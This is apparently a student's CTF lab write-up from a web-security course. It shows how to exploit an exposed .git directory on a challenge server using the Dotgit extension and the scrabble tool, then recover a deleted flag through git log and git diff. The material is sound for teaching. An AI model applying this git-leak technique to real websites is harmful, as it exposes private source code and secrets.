Simple Web 0x01(Lab - `gitleak`)

Posted on 2023-01-31 | Post modified | In Security/Course/NTUST WS/Information Leak |

Simple Web 0x01(Lab - `gitleak`)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:9000/

Exploit - gitleak + basic Git command

Use the extension of Firefox(or Google), Dotgit, to check if the website actually has git leak problem

denny0223/scrabble To use scrabble tool to leak information

$ git clone https://github.com/denny0223/scrabble.git
$ cd scrabble
$ sudo ./scrabble http://h4ck3r.quest:9000/

Still no flag There’s flag.php but still no flag in there. HEAD said HEAD is now at a0228bd Remove flag. Thus, we can look up the history by the command below.

 $ git log --stat a0228bd
 commit a0228bd6ff968f3eca017125a5434b517ad2a83a (HEAD -> master)
 Author: splitline <tbsthitw@gmail.com>
 Date:   Wed Mar 9 16:23:46 2022 +0800

     Remove flag.

  flag.php | 2 +-
  1 file changed, 1 insertion(+), 1 deletion(-)

 commit 6cfe38db75ec90126f53088ea87c286c83c1bfb3
 Author: splitline <tbsthitw@gmail.com>
 Date:   Wed Mar 9 16:23:15 2022 +0800

     Init

  flag.php  | 5 +++++
  index.php | 1 +
  2 files changed, 6 insertions(+)

Check the difference of commit version

 $ git diff HEAD <commit-id>
 diff --git a/flag.php b/flag.php
 index d1f8785..5b6cf79 100644
 --- a/flag.php
 +++ b/flag.php
 @@ -1,5 +1,5 @@
  <?php
 -// No flag for you!
- [ ]     +$FLAG = "FLAG{gitleak_is_fun}";
  ?>

  Flag is in the source code.
 \ No newline at end of file

Post author: SBK6401
Post link: https://bernie6401.github.io/security/course/ntust%20ws/information%20leak/2023/01/31/Simple-Web-0x01(Lab-gitleak-)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.